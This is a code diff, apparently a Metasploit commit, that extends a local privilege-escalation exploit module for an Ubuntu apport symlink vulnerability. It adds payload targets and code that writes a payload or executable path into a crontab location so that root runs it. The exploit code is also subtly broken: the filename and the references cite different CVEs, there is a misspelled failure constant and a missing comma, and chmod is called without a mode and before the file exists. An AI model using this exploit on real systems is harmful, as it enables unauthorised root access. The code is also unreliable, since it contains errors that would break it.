Add targets and write exploit files

Author: gardnerapp

modules/exploits/linux/local/cve_2020_9931_apport_symlink_privesc.rb

@@ -30,20 +30,35 @@ def initialize(info = {})
         ],
         'References' => [
           [
-           'URL', 'https://nostarch.com/zero-day' # pg. 59
+           'URL', 'https://nostarch.com/zero-day', # pg. 59
+           'URL', 'https://ubuntu.com/security/CVE-2020-8831',
+           'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8831'
           ]
         ],
         'Platform' => 'linux',
         'Targets' => [
           [
-            
+            'Linux_Binary',
+            {
+              'Arch' => [ARCH_AARCH64, ARCH_X64]
+            }
+          ],
+          [
+            'Linux_Command',
+            {
+              'Arch' => ARCH_CMD
+               'Payload' =>
+                {
+                  'BadChars' => "\x22\x27"
+                }
+            }
           ]
         ],
         'Payload' => {
           'BadChars' => "\x00"
         },
         'Privileged' => false,
-        'DisclosureDate' => '',
+        'DisclosureDate' => '2 April 2020',
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -106,11 +121,17 @@ def exploit
       fail_with(Failue::NotFound, 'Exploit was unable to create a crontab owned by root.')
     end
 
-  
-    # Touching a file to this
-    # verifying the permissions on the file (root ownership)
-    # writing payloads 
-    # what type of payloads
+    print_status 'Uploading payload'
+
+    # create the payload
+    if target.arch.first == ARCH_CMD
+      payload = payload.encoded
+      write_file('/etc/crontab/lock', payload)
+    else 
+      payload_file = '/tmp/' + Rex::Text.rand_text_alpha(rand(6..13))
+      chmod(payload_file)
+      write_file payload_file, generate_payload_exe
+      write_file '/etc/crontab/lock', payload_file
+    end 
   end
-
 end